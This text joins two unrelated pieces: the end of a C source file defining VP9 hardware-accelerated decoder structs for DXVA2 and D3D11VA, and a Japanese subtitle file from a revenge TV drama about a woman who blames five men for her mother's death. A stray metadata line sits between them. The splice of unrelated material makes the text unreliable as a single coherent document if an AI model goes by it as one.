    .start_frame    = dxva2_vp9_start_frame,
    .decode_slice   = dxva2_vp9_decode_slice,
    .end_frame      = dxva2_vp9_end_frame,
    .frame_params   = ff_dxva2_common_frame_params,
    .frame_priv_data_size = sizeof(struct vp9_dxva2_picture_context),
    .priv_data_size = sizeof(FFDXVASharedContext),
};
#endif

#if CONFIG_VP9_D3D11VA2_HWACCEL
const AVHWAccel ff_vp9_d3d11va2_hwaccel = {
    .name           = "vp9_d3d11va2",
    .type           = AVMEDIA_TYPE_VIDEO,
    .id             = AV_CODEC_ID_VP9,
    .pix_fmt        = AV_PIX_FMT_D3D11,
    .init           = ff_dxva2_decode_init,
    .uninit         = ff_dxva2_decode_uninit,
    .start_frame    = dxva2_vp9_start_frame,
    .decode_slice   = dxva2_vp9_decode_slice,
    .end_frame      = dxva2_vp9_end_frame,
    .frame_params   = ff_dxva2_common_frame_params,
    .frame_priv_data_size = sizeof(struct vp9_dxva2_picture_context),
    .priv_data_size = sizeof(FFDXVASharedContext),
};
#endif
| {
"pile_set_name": "Github"
} |
1
00:00:33,545 --> 00:00:35,447
(網浜サキ)
母は5人の男に殺されたんです。
2
00:00:35,447 --> 00:00:39,218
(直美)まさか
野村先生 中川肇 本田典史➡
3
00:00:39,218 --> 00:00:41,120
それ以外に 2人いるってこと?
4
00:00:41,120 --> 00:00:42,821
警察へ行ったらどうですか?
5
00:00:42,821 --> 00:00:46,025
何の証拠もない。
だから 何の罪もない。
6
00:00:46,025 --> 00:00:48,711
証拠がないことと 罪がないことは
違う。
7
00:00:48,711 --> 00:00:52,511
(恵)あなたのスーツのジャケットから
出てきたわ。
8
00:00:56,485 --> 00:00:59,338
(須藤)うわぁ~!
9
00:00:59,338 --> 00:01:02,191
はぁ…。➡
10
00:01:02,191 --> 00:01:07,012
あぁ~~~!
11
00:01:07,012 --> 00:01:09,231
ピンポーン ピンポーン ピンポーン…(インターホンの音)
12
00:01:09,231 --> 00:01:11,333
ピンポーン ピンポーン…
13
00:01:11,333 --> 00:01:13,018
ドンドン ドンドン!
14
00:01:13,018 --> 00:01:14,987
ピンポーン ピンポーン…
15
00:01:14,987 --> 00:01:16,639
はい。
16
00:01:16,639 --> 00:01:18,791
ドンドン!ドン!
17
00:01:18,791 --> 00:01:22,127
[外:4BA6B8A62163F66E333F15509AF8BCDA] どういうつもりだ?
18
00:01:22,127 --> 00:01:25,114
[外:4BA6B8A62163F66E333F15509AF8BCDA] 何考えてんだ!?
19
00:01:25,114 --> 00:01:27,514
[外:4BA6B8A62163F66E333F15509AF8BCDA] 一体
俺が何をしたっていうんだ!?
20
00:01:30,953 --> 00:01:32,553
答えろ!!
21
00:01:34,356 --> 00:01:37,042
言ったでしょ。
22
00:01:37,042 --> 00:01:41,380
私の母は5人の男に殺されたって。
23
00:01:41,380 --> 00:01:44,950
えっ その中に…➡
24
00:01:44,950 --> 00:01:47,950
俺が入ってんのか?
25
00:01:53,976 --> 00:01:58,480
[外:4BA6B8A62163F66E333F15509AF8BCDA] いつだ? いつなんだ?
26
00:01:58,480 --> 00:02:01,500
勘違いじゃないのか?
27
00:02:01,500 --> 00:02:04,600
俺は そんな覚えはないぞ!
28
00:02:06,338 --> 00:02:10,438
そうね。 あなたはそうでしょうね。
29
00:02:13,846 --> 00:02:16,546
み~んな
忘れてるって言ったでしょ。
30
00:02:20,569 --> 00:02:23,706
やったほうは記憶にない。
31
00:02:23,706 --> 00:02:28,093
でも やられたほうは忘れない。
32
00:02:28,093 --> 00:02:29,893
決して。
33
00:02:35,918 --> 00:02:38,587
見てるわね。
34
00:02:38,587 --> 00:02:41,306
えっ?
35
00:02:41,306 --> 00:02:46,406
あなたの大事な家族が
壊れていくの。
36
00:02:49,982 --> 00:02:51,582
ふふふっ…。
37
00:02:54,920 --> 00:02:57,356
壊れる?
38
00:02:57,356 --> 00:03:01,710
ええ そう。 音を立ててね。
39
00:03:01,710 --> 00:03:05,310
[外:4BA6B8A62163F66E333F15509AF8BCDA] そんなわけないだろ!
そんなわけ…。
40
00:03:09,218 --> 00:03:14,022
(ナレーション)<人は幸せよりも
苦しみを覚えている。>
41
00:03:14,022 --> 00:03:19,495
<傷つけたことより
傷つけられたことを覚えている。>
42
00:03:19,495 --> 00:03:24,099
< きっと
彼らは覚えていないのだろう。>
43
00:03:24,099 --> 00:03:29,538
<私と会うのが
二度目だということを。>
44
00:03:29,538 --> 00:03:45,338
♬~
45
00:03:47,389 --> 00:03:50,742
(直美)新田のお母さんは
心不全で亡くなったんだよね?
46
00:03:50,742 --> 00:03:52,427
(新田隼人)はい。
47
00:03:52,427 --> 00:03:54,446
(回想 医師)
⦅救急で運ばれたときには➡
48
00:03:54,446 --> 00:03:57,483
もう 呼吸が…。➡⦆
49
00:03:57,483 --> 00:04:03,405
⦅死因は
心臓発作による急性心不全です。⦆
50
00:04:03,405 --> 00:04:09,194
もともと心臓が弱くて
街で倒れて そのまま…。
51
00:04:09,194 --> 00:04:13,148
その当時のお母さんに
変わった様子はなかった?
52
00:04:13,148 --> 00:04:17,169
なかったと思います。
そっか。
53
00:04:17,169 --> 00:04:20,289
(岩城)5人の男に殺された。➡
54
00:04:20,289 --> 00:04:26,078
そして サキさんと関わりのあった
3人が 自殺 殺人未遂。
55
00:04:26,078 --> 00:04:28,046
普通に考えれば➡
56
00:04:28,046 --> 00:04:32,017
3人は復讐のターゲットだった
ということですよね。
57
00:04:32,017 --> 00:04:38,690
(直美)う~ん… てことは
野村先生と中川肇と本田典史は➡
58
00:04:38,690 --> 00:04:42,327
新田のお母さんと接点があった
ってことだよね?
59
00:04:42,327 --> 00:04:45,831
(岩城)3人と新田のお母さんの
関係をあたってみますか。
60
00:04:45,831 --> 00:04:47,431
そうだね。
61
00:04:50,469 --> 00:04:54,590
新田も つらいと思うけど。
いえ➡
62
00:04:54,590 --> 00:04:57,893
これ以上
犠牲者を出すわけにはいきません。
63
00:04:57,893 --> 00:05:08,704
♬~
64
00:05:08,704 --> 00:05:10,304
(ドアの開閉音)
65
00:05:20,732 --> 00:05:22,532
おかえりなさい。
66
00:05:30,292 --> 00:05:32,692
はぁ~…。
67
00:05:34,980 --> 00:05:36,580
恵。
68
00:05:38,600 --> 00:05:40,900
休みを取るよ。
69
00:05:43,272 --> 00:05:44,872
えっ?
70
00:05:47,576 --> 00:05:53,576
アラスカに
オーロラを見にいこう。
71
00:05:55,817 --> 00:05:57,469
オーロラ?
72
00:05:57,469 --> 00:06:04,760
ああ。 そうだよ。
73
00:06:04,760 --> 00:06:11,984
オーロラだ。 いいだろ?
74
00:06:11,984 --> 00:06:13,735
オーロラ…。
75
00:06:13,735 --> 00:06:32,871
♬~
76
00:06:32,871 --> 00:06:52,891
♬~
77
00:06:52,891 --> 00:06:55,260
♬~
78
00:06:55,260 --> 00:06:57,212
(和繁)「風邪 大丈夫ですか?➡
79
00:06:57,212 --> 00:07:00,015
指輪は
オレからのサプライズです。➡
80
00:07:00,015 --> 00:07:04,115
早く元気になってください。
和繁」。
81
00:07:13,195 --> 00:07:15,395
(良太)あの 何か?
82
00:07:17,966 --> 00:07:21,753
(堀江)あら? 和繁君じゃない。
(良太)誰?
83
00:07:21,753 --> 00:07:25,007
(依里)理事長の息子さん。
(良太)へぇ~。
84
00:07:25,007 --> 00:07:27,707
(堀江)理事長なら お部屋に…。
(和繁)サキさんは?
85
00:07:30,545 --> 00:07:32,145
どうしたの?
86
00:07:36,184 --> 00:07:40,105
俺 見たんです。
87
00:07:40,105 --> 00:07:42,605
見た? 何を?
88
00:07:47,045 --> 00:07:52,145
(和繁)
おやじを サキさんのマンションで。
89
00:07:54,169 --> 00:07:59,569
それが どういうことなのか
ずっと考えてて…。
90
00:08:02,994 --> 00:08:09,885
風邪をひいてるって言ったら
いろいろ届けてくださるって。
91
00:08:09,885 --> 00:08:15,540
えっ?
やっぱり理事長は上司だし➡
92
00:08:15,540 --> 00:08:21,179
ありがとうございますって
言ったほうが いいのかなと思って。
93
00:08:21,179 --> 00:08:23,949
そんな…。
94
00:08:23,949 --> 00:08:30,272
あっ あなたがチャイムを
押してたとき➡
95
00:08:30,272 --> 00:08:35,172
お父さんも見てたのよ。
リビングのモニターから。
96
00:08:39,247 --> 00:08:42,601
⦅ちょ… ちょっと。⦆
97
00:08:42,601 --> 00:08:44,753
⦅ちょっと…。⦆
98
00:08:44,753 --> 00:08:48,153
私 そのとき 思ったんだけど…。
99
00:08:53,945 --> 00:08:55,614
ううん。
100
00:08:55,614 --> 00:08:57,282
サキさん!
101
00:08:57,282 --> 00:09:05,674
♬~
102
00:09:05,674 --> 00:09:11,613
ふだんは 病院の理事長として
きぜんとしているし➡
103
00:09:11,613 --> 00:09:17,913
いい夫 いい父親なのに
やっぱり…。
104
00:09:20,071 --> 00:09:22,757
男なんだなぁって。
105
00:09:22,757 --> 00:09:30,081
♬~
106
00:09:30,081 --> 00:09:39,574
つまり 理事長にとって私は
息子の相手じゃなくて➡
107
00:09:39,574 --> 00:09:43,111
そういう目で見られてた
ってことになるんだけど…。
108
00:09:43,111 --> 00:09:51,203
♬~
109
00:09:51,203 --> 00:09:57,776
でも 今思うと
思い当たることもあるかも。
110
00:09:57,776 --> 00:09:59,376
何?
111
00:10:02,547 --> 00:10:05,033
ひげ。
112
00:10:05,033 --> 00:10:06,633
えっ?
113
00:10:10,172 --> 00:10:14,509
おひげ ないほうが すてきかも
って言ったら➡
114
00:10:14,509 --> 00:10:16,909
翌日 そってた。
115
00:10:20,782 --> 00:10:26,482
お父さん 私の部屋にまで来て
言いたかったことはね…。
116
00:10:29,241 --> 00:10:31,109
あなたとの縁を➡
117
00:10:31,109 --> 00:10:34,009
切ってほしいってことだったわ。
118
00:10:35,747 --> 00:10:37,415
父さんが…。
119
00:10:37,415 --> 00:10:39,284
≪野村弁護士との関係ですか?
120
00:10:39,284 --> 00:10:41,987
(岩城)
ええ。 新田明美さんといいます。
121
00:10:41,987 --> 00:10:46,541
亡くなるまで 新田金属工業という
部品工場を経営していたんです。
122
00:10:46,541 --> 00:10:50,745
新田金属工業…。
123
00:10:50,745 --> 00:10:53,031
クライアントでは
ありませんね。➡
124
00:10:53,031 --> 00:10:56,284
私も その方を存じあげませんし
聞いたことありません。
125
00:10:56,284 --> 00:10:58,153
そうですか…。
126
00:10:58,153 --> 00:11:02,958
では 日整空調管理という
会社名は?
127
00:11:02,958 --> 00:11:07,045
いえ。
ITゲートという会社名は?
128
00:11:07,045 --> 00:11:09,547
いえ。
あぁ~。
129
00:11:09,547 --> 00:11:13,518
個人名では どうですかね?
こちらが中川肇さん➡
130
00:11:13,518 --> 00:11:17,205
こちらが
本田典史さんっていうんです。
131
00:11:17,205 --> 00:11:19,641
野村先生は ここ数年➡
132
00:11:19,641 --> 00:11:23,712
個人の案件を
受けたことがないと思うんですが。
133
00:11:23,712 --> 00:11:26,081
≪新田さん…。➡
134
00:11:26,081 --> 00:11:29,751
いや 中川社長からは
聞いたことありませんね。
135
00:11:29,751 --> 00:11:31,403
(梨沙)私もないです。
136
00:11:31,403 --> 00:11:35,407
新田金属工業も
日整空調管理も➡
137
00:11:35,407 --> 00:11:39,711
浦ヶ浜法律事務所も
聞いたことはないんですよね?
138
00:11:39,711 --> 00:11:41,311
ええ。
139
00:11:43,131 --> 00:11:46,184
じゃあ こちらの方々は?
140
00:11:46,184 --> 00:11:50,755
(道子)聞いたことないし
うちの取引先ではないです。
141
00:11:50,755 --> 00:11:52,407
そうですか。
142
00:11:52,407 --> 00:11:57,078
あっ これ 頼まれていた
本田さんの業務日誌のコピーです。
143
00:11:57,078 --> 00:11:59,878
ありがとうございます。
お借りします。
144
00:12:02,500 --> 00:12:04,636
(須藤)おいしそうなスープだね。
145
00:12:04,636 --> 00:12:08,256
今日は
豆乳野菜スープなの。
146
00:12:08,256 --> 00:12:11,643
あぁ へぇ~。
147
00:12:11,643 --> 00:12:13,543
(恵)和君 おかえりなさい。
148
00:12:15,246 --> 00:12:16,846
はぁ~!
149
00:12:19,601 --> 00:12:21,753
どういうことだよ?
150
00:12:21,753 --> 00:12:24,856
(恵)あなた 大丈夫?
151
00:12:24,856 --> 00:12:26,958
ああ。
152
00:12:26,958 --> 00:12:31,563
和君。 お父さんに 何てことを…
どうしちゃったの?
153
00:12:31,563 --> 00:12:37,402
俺 出てくから こんな家。
154
00:12:37,402 --> 00:12:40,755
えっ?
(和繁)昨日の夜➡
155
00:12:40,755 --> 00:12:44,655
おやじ
サキさんの家に行ってたよ。
156
00:12:48,680 --> 00:12:50,480
俺 見たんだ。
157
00:12:54,753 --> 00:12:57,889
誤解だ。 違う。
158
00:12:57,889 --> 00:12:59,607
何が違うんだよ 違わないだろ?
159
00:12:59,607 --> 00:13:04,679
(須藤)違う 違う 理由があるんだ。
やましい気持ちなんてない。
160
00:13:04,679 --> 00:13:07,682
理由?
ああ。
161
00:13:07,682 --> 00:13:10,518
俺と縁を切れって言いに?➡
162
00:13:10,518 --> 00:13:13,918
わざわざ
家に上がり込んだっていうのか?
163
00:13:15,523 --> 00:13:19,361
俺をだしにしたんだろ?
164
00:13:19,361 --> 00:13:21,961
自分がサキさんを好きだからって。
165
00:13:23,698 --> 00:13:27,118
えっ?
普通 息子をだしになんてするか?
166
00:13:27,118 --> 00:13:28,887
いくら
2人っきりになりたいからって。
167
00:13:28,887 --> 00:13:31,156
何をばかなことを!
(恵)あなた どういうことなの?
168
00:13:31,156 --> 00:13:35,076
(須藤)違う 違うんだよ。
169
00:13:35,076 --> 00:13:37,112
誤解されるようなこと
言うんじゃねぇよ!
170
00:13:37,112 --> 00:13:38,780
じゃあ
何で隠してたんだよ?
171
00:13:38,780 --> 00:13:43,735
(須藤)だから こうやって
誤解させたら困ると思ったんだよ。
172
00:13:43,735 --> 00:13:48,873
誤解?
まっとうな理由だったら➡
173
00:13:48,873 --> 00:13:55,173
俺に言えなくても
母さんには言えるよな?
174
00:14:01,986 --> 00:14:06,386
あのイヤリングも
サキさんのなの?
175
00:14:09,394 --> 00:14:13,131
はめられたんだ。
はめられた?
176
00:14:13,131 --> 00:14:16,651
(須藤)全部
あいつが仕組んだ わななんだ。➡
177
00:14:16,651 --> 00:14:18,503
あいつは
うちを壊そうとしてるんだよ。
178
00:14:18,503 --> 00:14:20,572
うちを壊して 何の得があるの?
179
00:14:20,572 --> 00:14:24,742
サキさんに
どんな理由があるっていうの?➡
180
00:14:24,742 --> 00:14:30,432
サキさんは 和繁が…➡
181
00:14:30,432 --> 00:14:32,884
あなたの息子が
好きになった人なのよ?
182
00:14:32,884 --> 00:14:34,784
わかってるの?
183
00:14:36,488 --> 00:14:40,191
サキさん言ってたよ。
184
00:14:40,191 --> 00:14:44,813
ふだんは 病院の理事長として
きぜんとしてても➡
185
00:14:44,813 --> 00:14:50,552
いい夫 いい父親でも
やっぱり…➡
186
00:14:50,552 --> 00:14:53,252
ただの男なんだなぁって。
187
00:14:55,056 --> 00:14:58,056
そういう目で
私を見てたんだってね。
188
00:15:00,645 --> 00:15:02,245
あなた…。
189
00:15:06,284 --> 00:15:11,422
信じてくれ… 俺を。➡
190
00:15:11,422 --> 00:15:13,022
なぁ。
191
00:15:15,143 --> 00:15:19,214
恵 なぁ。 恵。
192
00:15:19,214 --> 00:15:23,914
(和繁)ひげそったのも サキさんが
言ったからなんだってな。
193
00:15:26,221 --> 00:15:29,174
ひげがないほうがいい
って言われて➡
194
00:15:29,174 --> 00:15:31,559
すぐに そったらしいじゃないか。
195
00:15:31,559 --> 00:15:33,461
そんなこと…。
196
00:15:33,461 --> 00:15:39,367
♬~
197
00:15:39,367 --> 00:15:41,069
恵!
198
00:15:41,069 --> 00:15:42,820
恵!
199
00:15:42,820 --> 00:15:44,420
さよなら。
200
00:15:47,992 --> 00:15:52,547
ピンポーン ピンポーン…
201
00:15:52,547 --> 00:15:56,467
ピンポーン ピンポーン…
202
00:15:56,467 --> 00:15:59,020
ピンポン!ピンポン!ピンポン…
203
00:15:59,020 --> 00:16:00,672
開けなさいよ。
204
00:16:00,672 --> 00:16:03,208
ピンポン!ピンポン!ピンポン…
205
00:16:03,208 --> 00:16:06,394
開けなさい!!
206
00:16:06,394 --> 00:16:07,994
ピー(解錠の音)
207
00:16:09,864 --> 00:16:13,864
208
00:16:15,887 --> 00:16:28,687
209
00:17:30,878 --> 00:17:36,668
210
00:17:36,668 --> 00:17:39,068
ピンポーン!
211
00:17:57,889 --> 00:17:59,791
212
00:17:59,791 --> 00:18:01,391
恵さん。
213
00:18:07,949 --> 00:18:09,749
うそつき。
214
00:18:12,020 --> 00:18:14,305
信じてたのに。
215
00:18:14,305 --> 00:18:19,877
♬~
216
00:18:19,877 --> 00:18:21,546
うっ…。
217
00:18:21,546 --> 00:18:26,534
何で… どうして私をだましたの?
218
00:18:26,534 --> 00:18:30,234
あのパールのイヤリングだって
あなたのなんでしょ?
219
00:18:32,056 --> 00:18:37,256
許せない… 絶対に許さない。
220
00:18:39,797 --> 00:18:42,097
いった~。
221
00:18:43,851 --> 00:18:48,322
はぁはぁ はぁ…。
222
00:18:48,322 --> 00:18:49,922
何なの?
223
00:18:53,494 --> 00:18:55,813
あなたが悪いんじゃない!
224
00:18:55,813 --> 00:19:14,882
♬~
225
00:19:14,882 --> 00:19:23,141
♬~
226
00:19:23,141 --> 00:19:25,676
結婚していても➡
227
00:19:25,676 --> 00:19:28,880
誰かに ときめくことや
愛してしまうことは止められない。
228
00:19:28,880 --> 00:19:30,598
そう言ったでしょう?
229
00:19:30,598 --> 00:19:36,938
♬~
230
00:19:36,938 --> 00:19:40,608
因果応報とでも言いたいわけ?
231
00:19:40,608 --> 00:19:46,108
私は 絶対 渡さないわよ。
必ず奪い返してみせる。
232
00:19:48,483 --> 00:19:52,483
はぁ… ははっ。
233
00:19:55,907 --> 00:19:59,544
何 笑ってんの?
234
00:19:59,544 --> 00:20:02,544
生き生きしてるなぁと思って。
235
00:20:05,383 --> 00:20:07,835
勘違いしないで。
236
00:20:07,835 --> 00:20:12,657
私 ご主人のことなんて
何とも思ってないから。
237
00:20:12,657 --> 00:20:14,257
えっ?
238
00:20:15,993 --> 00:20:21,493
じゃあ
し… 主人のほうが一方的に?
239
00:20:25,470 --> 00:20:27,070
恵さん。
240
00:20:31,292 --> 00:20:35,179
そういう本当のあなたに
戻ればいいのよ。
241
00:20:35,179 --> 00:20:43,254
♬~
242
00:20:43,254 --> 00:20:45,054
思い出して。
243
00:20:49,076 --> 00:20:53,576
あなたを
幸せにすることができるのは 誰?
244
00:20:58,019 --> 00:21:00,588
何が一番の幸せ?
245
00:21:00,588 --> 00:21:06,894
♬~
246
00:21:06,894 --> 00:21:09,294
よ~く考えて。
247
00:21:13,267 --> 00:21:15,867
あなたなら わかるでしょ?
248
00:21:17,955 --> 00:21:20,855
自分自身の人生なんだから。
249
00:21:25,746 --> 00:21:30,084
(岩城)3人と新田のお母さんの接点
なかなか見つかりませんね。
250
00:21:30,084 --> 00:21:32,570
(直美)2007年の2月28日➡
251
00:21:32,570 --> 00:21:35,323
中川さんは
契約先の企業回りをしていた。➡
252
00:21:35,323 --> 00:21:37,825
13時に
渋谷区にあるグランソフト社➡
253
00:21:37,825 --> 00:21:40,261
15時に
品川区の 桑栄社でしょ?➡
254
00:21:40,261 --> 00:21:43,214
で 18時に
代官山のレストランで会食。➡
255
00:21:43,214 --> 00:21:46,200
多分 タクシーか自家用車で
移動してるはずだって。
256
00:21:46,200 --> 00:21:48,553
本田は空調修理の現場にいました。
257
00:21:48,553 --> 00:21:51,205
現場は
品川区 大山 三元第1ビル。
258
00:21:51,205 --> 00:21:53,274
会社から自転車で向かっています。
259
00:21:53,274 --> 00:21:54,959
野村先生は?
260
00:21:54,959 --> 00:21:56,677
その日は
何か 休みだったようです。
261
00:21:56,677 --> 00:21:59,680
休み。 何してたって?
262
00:21:59,680 --> 00:22:01,866
わかんないんですよ。
6年も前だし➡
263
00:22:01,866 --> 00:22:04,418
行動をつかむのに
時間かかるかもしれません。
264
00:22:04,418 --> 00:22:08,055
そうだよね。 引き続き調べてみて。
265
00:22:08,055 --> 00:22:09,655
はい。
はい。
266
00:23:42,867 --> 00:23:57,698
267
00:23:57,698 --> 00:24:00,298
恵さん 食べましょ。
268
00:24:07,341 --> 00:24:09,041
恵さん?
269
00:24:15,966 --> 00:24:18,366
いただきます。
270
00:24:31,982 --> 00:24:35,682
おかしな話かもしれないけど…。
271
00:24:37,705 --> 00:24:42,510
やっぱり私は…➡
272
00:24:42,510 --> 00:24:49,410
あなたに出会えて良かったって
思ってる。
273
00:24:51,352 --> 00:24:53,054
恵さん。
274
00:24:53,054 --> 00:25:02,947
♬~
275
00:25:02,947 --> 00:25:05,800
気持ち悪くなっちゃった。
276
00:25:05,800 --> 00:25:07,551
えっ?
277
00:25:07,551 --> 00:25:09,751
あの人のこと。
278
00:25:11,756 --> 00:25:15,356
このドレッシング
すっごくおいしいわ。
279
00:25:18,079 --> 00:25:20,414
ふふっ。
ふふふっ。
280
00:25:20,414 --> 00:25:39,867
♬~
281
00:25:39,867 --> 00:25:48,967
♬~
282
00:26:00,871 --> 00:26:19,557
283
00:26:19,557 --> 00:26:23,157
ふぅ~…。
284
00:26:42,880 --> 00:27:02,867
285
00:27:02,867 --> 00:27:05,603
286
00:27:05,603 --> 00:27:24,503
♬~
287
00:27:27,107 --> 00:27:28,776
≫へい お待ち~!
288
00:27:28,776 --> 00:27:30,461
(直美・岩城)
ありがとうございます!
289
00:27:30,461 --> 00:27:35,549
(岩城)なあ 新田のお母さんってさ
どんなお母さんだったの?
290
00:27:35,549 --> 00:27:37,518
えっ?
ふふふっ。
291
00:27:37,518 --> 00:27:40,804
いや 多分…。
うん。
292
00:27:40,804 --> 00:27:45,059
どこにでもいる あの
普通の優しい母さん。
293
00:27:45,059 --> 00:27:47,595
(直美・岩城)はははっ…。
(直美)何となく そんな気はする➡
294
00:27:47,595 --> 00:27:49,313
新田 見てるとね。
うんうん。
295
00:27:49,313 --> 00:27:51,498
えっ?
296
00:27:51,498 --> 00:27:57,805
あっ 母さん
庭で花を育ててたんです。
297
00:27:57,805 --> 00:27:59,556
どんな花?
298
00:27:59,556 --> 00:28:04,561
白い花で ダイヤモンドリリーって
いうらしいんですけど。
299
00:28:04,561 --> 00:28:07,982
秋になると
庭に たくさん咲いて➡
300
00:28:07,982 --> 00:28:09,800
毎日 手入れしてました。
301
00:28:09,800 --> 00:28:13,554
へぇ~。
それで この間 調べてたら➡
302
00:28:13,554 --> 00:28:19,354
花言葉が出てきたんです。
花言葉? 何だったの?
303
00:28:21,612 --> 00:28:24,565
また会う日を楽しみに。
304
00:28:24,565 --> 00:28:32,523
♬~
305
00:28:32,523 --> 00:28:36,043
きっと 姉ちゃんのこと
思ってたんだなって…。
306
00:28:36,043 --> 00:28:39,747
俺には 何も言わなかったけど➡
307
00:28:39,747 --> 00:28:43,917
多分
会いたかったんじゃないかなって。
308
00:28:43,917 --> 00:28:49,523
♬~
309
00:28:49,523 --> 00:28:51,892
会ったんじゃないかな?
310
00:28:51,892 --> 00:28:56,692
えっ?
サキさん 現場にいたのかも。
311
00:28:59,016 --> 00:29:02,516
(直美)だから 殺されたって
言ったんじゃないのかな。
312
00:29:04,605 --> 00:29:06,605
⦅救急車 呼んでください!⦆
313
00:29:08,392 --> 00:29:10,294
念のために聞いておくけど➡
314
00:29:10,294 --> 00:29:16,467
新田は何してた?
2007年の2月28日。
315
00:29:16,467 --> 00:29:21,005
俺は… バイト先で連絡受けて。
316
00:29:21,005 --> 00:29:25,592
そう…。 明日 もう一度➡
317
00:29:25,592 --> 00:29:29,279
新田のお母さんが搬送された
病院に行って 確認してみよう。
318
00:29:29,279 --> 00:29:30,931
はい。
はい。
319
00:29:30,931 --> 00:29:50,884
♬~
320
00:29:50,884 --> 00:29:56,284
♬~
321
00:29:59,043 --> 00:30:02,443
(店員)89年って
何かの記念日なんですか?
322
00:30:04,131 --> 00:30:09,169
ええ。
あるご家族が生まれた日なの。
323
00:30:09,169 --> 00:30:12,556
そうなんですか。
そのご夫婦➡
324
00:30:12,556 --> 00:30:16,610
そのときに
新しい命を授かっていてね➡
325
00:30:16,610 --> 00:30:22,349
だから そのご夫婦と子供
家族3人のお祝い。
326
00:30:22,349 --> 00:30:25,652
すてきですね。
ふふっ。
327
00:30:25,652 --> 00:30:29,523
じゃあ もう1本のビンテージは?
328
00:30:29,523 --> 00:30:32,123
その年はね…。
(和繁)サキさん!
329
00:30:36,180 --> 00:30:40,567
こんにちは。
来てくれたんですか!
330
00:30:40,567 --> 00:30:43,754
この間 頼んだワインを
受け取りにきたの。
331
00:30:43,754 --> 00:30:45,889
♬~(店内のBGM)
332
00:30:45,889 --> 00:30:50,894
♬~
333
00:30:50,894 --> 00:30:52,494
(和繁)サキさん!
334
00:30:56,350 --> 00:30:59,550
俺 家を出ました。
335
00:31:01,271 --> 00:31:03,671
おやじとも縁を切ります。
336
00:31:06,343 --> 00:31:14,351
だから… もう何も
気にしなくていいんです!
337
00:31:14,351 --> 00:31:17,087
和繁君。
338
00:31:17,087 --> 00:31:21,925
俺と もう一度 ちゃんと
やり直してもらえませんか?
339
00:31:21,925 --> 00:31:31,802
♬~
340
00:31:31,802 --> 00:31:39,359
恵さんがね
いつも あなたのことを褒めてた。
341
00:31:39,359 --> 00:31:44,959
和君は
優しくて 素直で いい子だって。
342
00:31:47,334 --> 00:31:52,434
でもね 私に言わせると…。
343
00:31:54,958 --> 00:31:57,127
ただのばかなのよ。
344
00:31:57,127 --> 00:32:14,661
♬~
345
00:32:14,661 --> 00:32:16,313
はい。
346
00:32:16,313 --> 00:32:35,883
♬~
347
00:32:35,883 --> 00:32:38,483
♬~
348
00:34:12,312 --> 00:34:16,016
(医師)新田明美さん。
(岩城)運ばれたときに➡
349
00:34:16,016 --> 00:34:19,002
女性が一緒だったかどうか
わかりますか?
350
00:34:19,002 --> 00:34:23,090
いえ 記録が
残ってないので何とも…。
351
00:34:23,090 --> 00:34:26,310
あぁ~ そうですか。
352
00:34:26,310 --> 00:34:33,050
あの 当時 死因は
急性心不全だと聞いたのですが。
353
00:34:33,050 --> 00:34:39,056
ええ。 新田さんは もともと
心室中隔欠損症という➡
354
00:34:39,056 --> 00:34:42,492
先天性の心臓の病気を
抱えていたらしいですね。
355
00:34:42,492 --> 00:34:44,161
はい。
(医師)そういった方は➡
356
00:34:44,161 --> 00:34:46,980
心不全を来しやすいというか。
357
00:34:46,980 --> 00:34:51,218
じゃあ やっぱり
死因に不審な点は ないんですね。
358
00:34:51,218 --> 00:34:55,706
ええ。 結果的に死を早めた原因も
ないと思いますよ。
359
00:34:55,706 --> 00:34:58,492
過去に大きな手術でも
していないかぎりは。
360
00:34:58,492 --> 00:35:04,164
♬~
361
00:35:04,164 --> 00:35:07,300
死因に不審な点はない。
362
00:35:07,300 --> 00:35:09,369
それなのに殺されたって➡
363
00:35:09,369 --> 00:35:14,141
一体
どういうことなんだろうなぁ。
364
00:35:14,141 --> 00:35:15,741
ん? どうした?
365
00:35:17,477 --> 00:35:20,731
ごめん 俺 ちょっと…。
366
00:35:20,731 --> 00:35:23,231
先 帰ってて。 すぐ戻る。
367
00:35:27,154 --> 00:35:30,657
(医師)⦅結果的に死を早めた原因も
ないと思いますよ。➡⦆
368
00:35:30,657 --> 00:35:33,310
⦅過去に大きな手術でも
していないかぎりは。⦆
369
00:35:33,310 --> 00:35:52,879
♬~
370
00:35:52,879 --> 00:36:01,555
♬~
371
00:36:01,555 --> 00:36:03,423
すいません お忙しいところ。
372
00:36:03,423 --> 00:36:06,743
(祐樹)いえ ちょうど今夜
島根に帰るところだったんです。
373
00:36:06,743 --> 00:36:08,562
そうでしたか。
374
00:36:08,562 --> 00:36:27,864
♬~
375
00:36:27,864 --> 00:36:47,884
♬~
376
00:36:47,884 --> 00:36:49,936
♬~
377
00:36:49,936 --> 00:36:54,708
2007年2月28日は➡
378
00:36:54,708 --> 00:36:56,426
兄と一緒でした。
379
00:36:56,426 --> 00:37:00,826
えっ?
私の結婚式だったんです。
380
00:37:03,683 --> 00:37:06,603
野村先生は
出席されたんですよね?
381
00:37:06,603 --> 00:37:11,625
はい。 あっ だけど…
遅れてきたんです。
382
00:37:11,625 --> 00:37:14,425
遅れて?
ええ。
383
00:37:19,583 --> 00:37:22,252
どうして遅れたんですか?
384
00:37:22,252 --> 00:37:26,756
確か 家で
仕事をしなきゃならないとか➡
385
00:37:26,756 --> 00:37:29,192
うん そんな理由だったような気が
します。
386
00:37:29,192 --> 00:37:30,894
♬~(店内のBGM)
387
00:37:30,894 --> 00:37:35,499
♬~
388
00:37:35,499 --> 00:37:39,499
これ 兄の家から
持ってきたんです。
389
00:37:44,007 --> 00:37:49,012
(祐樹)離婚するのに こんな写真
持ってるのも おかしいんですけど。
390
00:37:49,012 --> 00:37:51,812
兄と撮った最後の写真だから。
391
00:37:55,585 --> 00:37:58,705
(祐樹)大人になってから
一緒に写真を撮ることなんて➡
392
00:37:58,705 --> 00:38:01,141
なかったんです。
393
00:38:01,141 --> 00:38:05,045
いい写真ですね。
ありがとうございます。
394
00:38:05,045 --> 00:38:11,852
♬~
395
00:38:11,852 --> 00:38:16,356
そういえば サキさんにも…。
サキさん?
396
00:38:16,356 --> 00:38:18,542
同じこと 聞かれたな。
397
00:38:18,542 --> 00:38:22,078
⦅野村さん
結婚式 遅れてきたの?⦆
398
00:38:22,078 --> 00:38:24,878
⦅どうして 遅れたんだろう?⦆
399
00:38:27,067 --> 00:38:30,036
[TEL](留守番電話のアナウンス)
メッセージをお預かりしました。
400
00:38:30,036 --> 00:38:46,887
♬~
401
00:38:46,887 --> 00:38:50,907
≪ピーポー ピーポー…(サイレンの音)
402
00:38:50,907 --> 00:38:53,107
ピーポー ピーポー…
403
